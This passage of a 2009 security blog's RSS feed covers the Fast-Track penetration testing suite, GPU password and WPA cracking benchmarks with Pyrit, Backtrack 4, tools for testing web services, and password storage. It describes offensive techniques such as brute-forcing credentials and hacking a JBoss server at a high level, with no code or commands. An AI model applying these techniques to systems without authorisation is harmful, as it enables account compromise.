domain="http://www.blogger.com/atom/ns#">backtrack</category><title>Fast-Track - Automated penetration testing suite</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.securestate.com/PublishingImages/FastTrackWebIconSm%20%283%29.gif"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 301px; height: 147px;" src="http://www.securestate.com/PublishingImages/FastTrackWebIconSm%20%283%29.gif" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Fast-track is&lt;br /&gt;&lt;blockquote&gt; "a compilation of custom developed tools that allow penetration testers the ease of advanced penetration techniques in a relatively easy manner"&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Fast-Track has tools for MSSQL server, SQL Injection, Metasploit Autopwn Automation, Mass Client Side attacks, exploits and a Payload generator.&lt;br /&gt;&lt;br /&gt;The idea is to provide easy  and fast to use tools, that will usually take you many steps, or some minor coding on existing tools. I liked the integration with Metasploit payloads.&lt;br /&gt;&lt;br /&gt;It's like  executing scripts and tools combos :)&lt;br /&gt;&lt;br /&gt;You can check a video of the SQLPwnage module in action:&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;object width="400" height="300"&gt;&lt;param name="allowfullscreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=3213722&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1"&gt;&lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=3213722&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;a href="http://vimeo.com/3213722"&gt;Fast-Track SQLPwnage&lt;/a&gt; from &lt;a href="http://vimeo.com/user1300648"&gt;David Kennedy&lt;/a&gt; on &lt;a href="http://vimeo.com/"&gt;Vimeo&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Presentation of Fast-Track at ShmooCon 2009, &lt;a href="http://shmoocon.org/slides/DKENNEDY_FastTrack_ShmooCon_2009.pdf"&gt;here&lt;/a&gt;&lt;br /&gt;Download &lt;a href="http://www.thepentest.com/"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Enjoy&lt;br /&gt;&lt;br /&gt;-CMM&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-5743447470597657663?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/02/fast-track-automated-penetration.html</link><author>noreply@blogger.com (Christian Martorella)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-8116344022461947354</guid><pubDate>Wed, 11 Feb 2009 22:48:00 +0000</pubDate><atom:updated>2009-02-12T00:20:31.889+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">CUDA</category><category domain="http://www.blogger.com/atom/ns#">bruteforce</category><category domain="http://www.blogger.com/atom/ns#">password cracking</category><title>CUDA and bruteforcing</title><description>Did you hear about &lt;a href="http://code.google.com/p/pyrit/"&gt;Pyrit&lt;/a&gt;?&lt;br /&gt;&lt;div style="text-align: justify; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;blockquote&gt;"Pyrit is implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff"&lt;/blockquote&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;Pyrit exploit the power of the new GPU, like the Nvidia family that support &lt;a href="http://en.wikipedia.org/wiki/CUDA"&gt;CUDA.&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;blockquote&gt;"CUDA is the compute engine in NVIDIA graphics processing units or GPUs, that is accessible to software developers through industry standard programming languages"&lt;/blockquote&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;Just look at this comparison of &lt;a href="http://code.google.com/p/pyrit/"&gt;pyrit&lt;/a&gt; running on different graphic cards:&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://pyrit.googlecode.com/svn/tags/opt/pyritperfaa3.png" border="0" alt="" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 670px; height: 476px; " /&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;div style="text-align: center; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;Well I wanted to know the performance of my GPU's, so i did some test on my Macbook Pro unibody, that has two Nvidia graphic cards on board, and here are the results:&lt;/div&gt;&lt;div style="text-align: center; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center; "&gt;Nvidia 9400 M&lt;/div&gt;&lt;div style="text-align: center; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;img src="http://3.bp.blogspot.com/_CzwlRHDUh5c/SZNTKfoUkqI/AAAAAAAAAOc/ucS6TDxWFy4/s320/ishot-2.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5301672626099622562" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 320px; height: 111px; " /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center; "&gt;Nvidia 9600 GT&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;div style="text-align: left; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;img src="http://3.bp.blogspot.com/_CzwlRHDUh5c/SZNTG4GOOUI/AAAAAAAAAOU/NyE_orMe3oU/s320/ishot-1.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5301672563948009794" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 320px; height: 117px; " /&gt;&lt;/div&gt;&lt;div style="text-align: center; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;With the 9400 M i got 690.67PMK/s  more than 2x of the CPU Core2duo 2.4Ghz, and with the 9600 GT i got 912.77 PMK/s almost 4x !!  &lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;Now it will be sweet to have both graphic cards working at the same time ;)&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;Pyrit is included in Backtrack  4 and in the next Pentoo release!&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;Also i tested another CUDA based bruteforcer, "&lt;a href="http://www.cryptohaze.com/bruteforcers.php"&gt;Multihash Bruteforcer&lt;/a&gt;":&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span"   style="color: rgb(0, 0, 153);   font-weight: bold; line-height: 21px; font-family:Verdana;font-size:14px;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span"   style="color: rgb(0, 0, 153);   font-weight: bold; line-height: 21px; font-family:Verdana;font-size:14px;"&gt;The world's fastest cross-platform MD4/MD5/NTLM cracking&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span"   style="color: rgb(0, 0, 153);   font-weight: bold; line-height: 21px; font-family:Verdana;font-size:14px;"&gt; for Windows/Mac/Linux&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;Here are the results on my Macbook Pro:&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify; "&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 108px;" src="http://4.bp.blogspot.com/_CzwlRHDUh5c/SZNaAK3GvEI/AAAAAAAAAOk/Ys2isrZRWnk/s320/ishot-3.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5301680145307188290" /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;I guess that this tool will improve over time, but they are giving great results right now.&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Enjoy your password cracking&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;-CMM&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-8116344022461947354?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/02/cuda-and-bruteforcing.html</link><author>noreply@blogger.com (Christian Martorella)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_CzwlRHDUh5c/SZNTKfoUkqI/AAAAAAAAAOc/ucS6TDxWFy4/s72-c/ishot-2.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-7266842686535140997</guid><pubDate>Wed, 11 Feb 2009 21:15:00 +0000</pubDate><atom:updated>2009-02-12T00:17:43.985+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">tools</category><category domain="http://www.blogger.com/atom/ns#">backtrack</category><title>Backtrack 4 is here! - Cuda support</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_CzwlRHDUh5c/SZNcifzSKfI/AAAAAAAAAOs/iSz4dNhhg0k/s1600-h/ishot-4.png"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 131px;" src="http://1.bp.blogspot.com/_CzwlRHDUh5c/SZNcifzSKfI/AAAAAAAAAOs/iSz4dNhhg0k/s320/ishot-4.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5301682934067112434" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;The new Backtrack 4 beta is out!, you can download your ISO &lt;a href="http://www.remote-exploit.org/backtrack_download.html"&gt;here&lt;/a&gt;, also you can check the backtrack 4 info on their &lt;a href="http://backtrack4.blogspot.com/"&gt;blog&lt;/a&gt;.&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;The most interesting feature is that is based on Ubuntu, this mean that will be easy to update, maintain, create packages, etc!  The Backtrack team wants that besides of being your live CD, to be your every day desktop, and with this change i think that a lot of users will make the change.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Another feature is the support for &lt;a href="http://code.google.com/p/pyrit/"&gt;pyrit&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/CUDA"&gt;CUDA&lt;/a&gt;, to exploit the power of the GPU's.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Enjoy &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;-CMM&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-7266842686535140997?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/02/backtrack-4-is-here-beta.html</link><author>noreply@blogger.com (Christian Martorella)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_CzwlRHDUh5c/SZNcifzSKfI/AAAAAAAAAOs/iSz4dNhhg0k/s72-c/ishot-4.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-8779783524868298597</guid><pubDate>Tue, 10 Feb 2009 07:47:00 +0000</pubDate><atom:updated>2009-02-10T23:48:29.836+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">tools</category><category domain="http://www.blogger.com/atom/ns#">web services</category><category domain="http://www.blogger.com/atom/ns#">web security</category><title>Web Services Security testing</title><description>&lt;div style="text-align: justify;"&gt;Last week  i had to perform a penetration test on a Web Services environment and during the project i found the following interesting documents:&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;SIFT  - Web Services Security Testing Framework  V1  - by SIFT  &lt;a href="http://www.sift.com.au/assets/downloads/SIFT-Web-Services-Security-Testing-Framework-v1-00.pdf"&gt;Link&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;This document is a great resource.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Web Services Security  - by Bilal Saddiqui &lt;a href="http://www.xml.com/pub/a/ws/2003/07/22/security.html?page=1"&gt;Link&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Exploring Web Services Encryption - by Bilal Saddiqui   &lt;a href="http://www.ibm.com/developerworks/library/x-encrypt/"&gt;Link&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;More on Web Services Encryption - by Schmoil &lt;a href="http://schmoil.blogspot.com/2008/03/web-services-security.html"&gt;Link&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Seguridad en Servicios Web (Spanish) - by Oscar Gonzales &lt;a href="http://www.samelan.com/oscargonzalez/doc/ws_security.pdf"&gt;Link&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;About the tools, i had some trouble with the usual hacking tools, we didn't had UDDI or JUDDI, so we had to hack the application server (Jboss) and then access the Web services admin panel, to get the WSDL.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;With the WDSL i proceed to perform some bruteforce attacks with &lt;a href="http://www.edge-security.com/webslayer.php"&gt;WebSlayer&lt;/a&gt; to find a valid username and password for the WS-Security (client authentication).&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;The other tool that i used was Appscan, Web Services Power tools that allowed me to get the descriptions, and perform request, but i didn't liked the way it handle the raw request...&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Another interesting tools is the &lt;a href="http://www.soapui.org/userguide/index.html"&gt;SOAPUI,&lt;/a&gt; the web services testing tool, it's very complete and i'm still learning on how to use it....&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Also we used &lt;a href="http://sourceforge.net/projects/wsfuzzer"&gt;WSFuzzer&lt;/a&gt; from OWASP. Here is a &lt;a href="http://www.learnsecurityonline.com/vid/WSfuzzer/WSfuzzerP1.html"&gt;video &lt;/a&gt;on how to use it&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;UPDATE:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-tab-span" style="white-space:pre"&gt; &lt;/span&gt;TSSCI -&lt;a href="ttp://www.tssci-security.com/archives/2008/12/14/writing-a-web-services-fuzzer-in-5-minutes-to-sql-injection/"&gt; Writing a web services fuzzer in 5 minutes&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Any other interesting tools or document?&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;-CMM&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-8779783524868298597?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/02/web-services-security-testing.html</link><author>noreply@blogger.com (Christian Martorella)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-7614690794427058317</guid><pubDate>Fri, 30 Jan 2009 06:33:00 +0000</pubDate><atom:updated>2009-01-30T09:15:06.666+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">web security</category><category domain="http://www.blogger.com/atom/ns#">coding</category><title>Protecting users from password theft</title><description>&lt;div style="text-align: justify;"&gt;A very good article from Chris Eng (Veracode), about how developers can design a strong password scheme in the applications to protect users from password theft. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Suppose that your database is stolen (hope no) is  the data protected? the thiefs could revert back the passwords easily?  In my lasts pentest the passwords were stored in clear texts..... so it's common practice to have the password stored in an insecure way, or even clear text.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Here is a good practice for your developers or customers:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;a href="http://www.veracode.com/"&gt;Veracode &lt;/a&gt;- &lt;a href="http://www.veracode.com/blog/2009/01/how-to-protect-your-users-from-password-theft/"&gt;How to protect your users from password theft&lt;/a&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;-CMM&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-7614690794427058317?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/01/protecting-users-from-password-theft.html</link><author>noreply@blogger.com (Christian Martorella)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-1658564178838642334</guid><pubDate>Wed, 28 Jan 2009 09:18:00 +0000</pubDate><atom:updated>2009-01-28T22:31:00.961+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">pci</category><category domain="http://www.blogger.com/atom/ns#">books</category><title>PCI for dummies</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.qualys.com/images/forms/right_dummies_pci.png"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 170px; height: 250px;" src="http://www.qualys.com/images/forms/right_dummies_pci.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Qualys, the leader provider of vulnerability scans, has published a free e-book entitled "PCI for dummies", if you want to get a grasp of what it is the PCI (Payment Card Industry), and learn how to comply with it, you can download your copy here:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.qualys.com/forms/ebook/pcifordummies/"&gt;http://www.qualys.com/forms/ebook/pcifordummies/&lt;/a&gt;&lt;a href="http://www.qualys.com/forms/ebook/pcifordummies/"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Enjoy &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;-CMM&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-1658564178838642334?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/01/pci-for-dummies.html</link><author>noreply@blogger.com (Christian Martorella)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item></channel></rss>
